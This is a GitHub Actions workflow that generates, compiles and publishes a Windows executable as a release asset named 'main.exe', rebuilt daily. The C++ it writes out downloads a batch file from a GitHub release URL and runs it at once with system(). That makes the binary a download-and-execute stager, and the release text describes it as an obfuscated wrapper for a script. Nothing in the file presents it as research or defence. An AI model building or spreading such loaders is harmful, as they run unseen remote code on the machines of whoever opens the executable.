name: EXE

on:
  push:
    paths:
      - 'run.cmd'
  schedule:
    - cron: '0 0 * * *'  # Runs every day at midnight UTC
  workflow_dispatch:  # Allows manual triggering

permissions:
  contents: write
  pull-requests: write
  repository-projects: write

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Set up C++ compiler
      uses: actions/setup-msbuild@v1

    - name: Create C++ file
      run: |
        echo "#include <iostream>" > script.cpp
        echo "#include <fstream>" >> script.cpp
        echo "#include <sstream>" >> script.cpp
        echo "#include <windows.h>" >> script.cpp
        echo "" >> script.cpp
        echo "int main() {" >> script.cpp
        echo "    // Download file" >> script.cpp
        echo "    const char* url = \"https://github.com/43a1723/test/releases/download/AutoBuild/download.bat\";" >> script.cpp
        echo "    const char* outFile = \"download.bat\";" >> script.cpp
        echo "    HINTERNET hInternet = InternetOpen(L\"MyApp\", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);" >> script.cpp
        echo "    HINTERNET hConnect = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0);" >> script.cpp
        echo "    if (hConnect) {" >> script.cpp
        echo "        std::ofstream file(outFile, std::ios::binary);" >> script.cpp
        echo "        char buffer[4096];" >> script.cpp
        echo "        DWORD bytesRead;" >> script.cpp
        echo "        while (InternetReadFile(hConnect, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {" >> script.cpp
        echo "            file.write(buffer, bytesRead);" >> script.cpp
        echo "        }" >> script.cpp
        echo "        file.close();" >> script.cpp
        echo "        InternetCloseHandle(hConnect);" >> script.cpp
        echo "    }" >> script.cpp
        echo "    InternetCloseHandle(hInternet);" >> script.cpp
        echo "    // Execute the batch file" >> script.cpp
        echo "    system(\"download.bat\");" >> script.cpp
        echo "    return 0;" >> script.cpp
        echo "}" >> script.cpp

    - name: Compile C++ Script
      run: |
        cl /EHsc script.cpp /link /OUT:script.exe

    - name: Delete-tag-and-release
      uses: dev-drprasad/delete-tag-and-release@v1.1
      with:
        tag_name: AutoBuildExe
        delete_release: true
        github_token: ${{ secrets.GITHUB_TOKEN }}

    - name: Create Release
      id: create_release
      uses: actions/create-release@latest
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      with:
        tag_name: AutoBuildExe
        release_name: AutoBuildExe
        body: Obfuscated run.cmd file
        draft: false
        prerelease: false

    - name: Upload Release Asset
      id: upload-release-asset 
      uses: actions/upload-release-asset@v1
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      with:
        upload_url: ${{ steps.create_release.outputs.upload_url }}
        asset_path: script.exe
        asset_name: main.exe
        asset_content_type: application/octet-stream
